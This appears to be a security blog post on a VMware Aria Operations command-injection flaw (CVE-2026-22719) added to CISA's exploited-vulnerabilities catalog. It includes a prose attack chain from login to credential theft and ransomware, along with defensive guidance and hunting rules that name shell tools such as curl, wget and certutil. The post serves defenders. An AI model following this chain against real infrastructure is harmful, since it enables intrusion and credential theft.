CISA Adds VMware Aria Operations RCE Flaw to KEV Catalog After Active Exploitation
CISA has added CVE-2026-22719 to its Known Exploited Vulnerabilities (KEV) catalog, confirming that a critical remote code execution flaw in VMware Aria Operations is being actively exploited in the wild. Federal agencies are now required to patch by March 18, 2026 under Binding Operational Directive 22-01.
The Vulnerability
CVE-2026-22719 is a command injection vulnerability (CWE-77) in VMware Aria Operations (formerly vRealize Operations) with a CVSS score of 8.1 (HIGH).
Key Details
| Attribute | Detail |
|---|---|
| CVE | CVE-2026-22719 |
| CVSS | 8.1 (HIGH) |
| CWE | CWE-77 (Command Injection) |
| Product | VMware Aria Operations |
| Vendor | Broadcom (VMware) |
| Advisory | Broadcom KB 430349 |
| KEV Added | March 3, 2026 |
| Patch Deadline | March 18, 2026 (FCEB agencies) |
VMware Aria Operations is a widely deployed infrastructure monitoring and management platform used across enterprise data centers and cloud environments. It provides performance monitoring, capacity planning, and workload optimization for VMware vSphere, Kubernetes, and multi-cloud deployments.
The command injection flaw allows an authenticated attacker with low-privilege access to execute arbitrary commands on the underlying operating system. Because Aria Operations typically runs with elevated privileges to manage infrastructure, successful exploitation grants the attacker effective root-level access to the monitoring platform — and potentially to the credentials and configurations it manages.
Why This Is Critical
While the CVSS score of 8.1 might seem moderate compared to 9.8-rated vulnerabilities, several factors make CVE-2026-22719 particularly dangerous in practice:
1. Credential Goldmine
Aria Operations stores credentials for connecting to monitored infrastructure:
- vCenter Server administrator credentials
- ESXi host root credentials
- Cloud provider access keys (AWS, Azure, GCP)
- Database and application monitoring credentials
- LDAP/Active Directory service accounts
Compromising Aria Operations gives attackers a single pivot point to the entire virtualization and cloud infrastructure.
2. Low Barrier to Entry
The vulnerability requires only authenticated access with low privileges. In many deployments, Aria Operations has:
- Read-only accounts shared across operations teams
- Service accounts with predictable or default credentials
- LDAP-integrated authentication where any domain user can log in
3. Network Position
Aria Operations servers typically sit in management networks with broad connectivity to:
- vCenter Servers and ESXi hosts
- Kubernetes clusters
- Cloud management planes
- Network devices and storage arrays
This network position makes post-exploitation lateral movement trivial.
4. Detection Blind Spot
Infrastructure monitoring platforms are rarely monitored themselves. Security teams focus on endpoints and servers but often exclude management tools from EDR coverage, creating a significant visibility gap.
Attack Scenario
Based on the vulnerability characteristics and typical deployment patterns, a realistic attack chain looks like:
Step 1: Gain authenticated access to Aria Operations
(compromised domain creds, default password, phishing)
Step 2: Exploit CVE-2026-22719 for command injection
→ OS-level command execution as the Aria Operations service account
Step 3: Extract stored credentials from Aria Operations database
→ vCenter admin, ESXi root, cloud provider keys
Step 4: Pivot to vCenter Server using extracted credentials
→ Full control of virtualization infrastructure
Step 5: Deploy ransomware/backdoors across all managed VMs
OR exfiltrate data from any managed workload
OR destroy infrastructure by deleting VMs and datastores
The entire chain from initial exploitation to full infrastructure compromise can be executed in minutes, not hours.
Affected Versions
Broadcom's advisory covers multiple versions of Aria Operations. Organizations should check:
- VMware Aria Operations (all versions prior to the patched release)
- VMware Cloud Foundation deployments that include Aria Operations
- vRealize Operations (the pre-rename product, if still in use)
Consult the Broadcom advisory KB 430349 for the exact version matrix and patched releases.
Defensive Recommendations
Immediate Actions (Do Today)
- Identify all Aria Operations instances in your environment — including those deployed by other teams or inherited from acquisitions
- Apply the Broadcom security patch immediately. This is not a "schedule for next maintenance window" situation — it's being actively exploited
- Restrict network access to the Aria Operations web interface. Only management workstations should reach it — not the entire corporate network
- Rotate all credentials stored in Aria Operations after patching. Assume they may have been extracted if exploitation occurred before patching
Detection and Hunting
# Hunt for exploitation indicators:
# 1. Unusual process execution from Aria Operations service
Monitor for child processes spawned by the Aria Operations Java process
that don't match normal operational behavior:
- cmd.exe / bash / sh spawned by Java process
- curl / wget / certutil / PowerShell from the Aria Operations server
- Outbound connections to non-VMware IPs from the management server
# 2. Credential access patterns
Alert on credential extraction:
- Database queries against the Aria Operations credential store
- API calls to retrieve stored passwords
- Bulk credential export operations
# 3. Lateral movement from Aria Operations server
Monitor for authentication from the Aria Operations server IP to:
- vCenter Server (especially using admin credentials)
- ESXi hosts (especially SSH)
- Cloud provider API endpoints
Strategic Hardening
- Segment management networks — Aria Operations should be in a dedicated management VLAN with strict firewall rules
- Implement MFA for Aria Operations access — prevent compromised passwords from being sufficient
- Deploy EDR on management servers — don't exclude infrastructure tools from security monitoring
- Audit stored credentials regularly — minimize the number of credentials stored in monitoring platforms
- Enable audit logging — ensure all Aria Operations API calls and authentication events are forwarded to SIEM
The Broader VMware Threat Landscape
CVE-2026-22719 continues a pattern of VMware product vulnerabilities being actively exploited in the wild. Over the past year:
- CVE-2025-22224/22225/22226: VMware ESXi and vCenter vulnerabilities exploited as zero-days
- CVE-2024-37079/37080: vCenter Server heap overflow bugs actively exploited
- CVE-2023-34048: vCenter out-of-bounds write exploited by Chinese state actors
The trend is clear: VMware infrastructure is a high-priority target for both nation-state actors and ransomware groups. The combination of credential storage, network position, and infrastructure control makes VMware management tools an ideal pivot point.
Organizations running VMware environments should treat every VMware security advisory as urgent, not routine.
Need help auditing your VMware security posture? Apply to our Beta Tester Program at theinsider-x.com — limited slots available.
Top comments (0)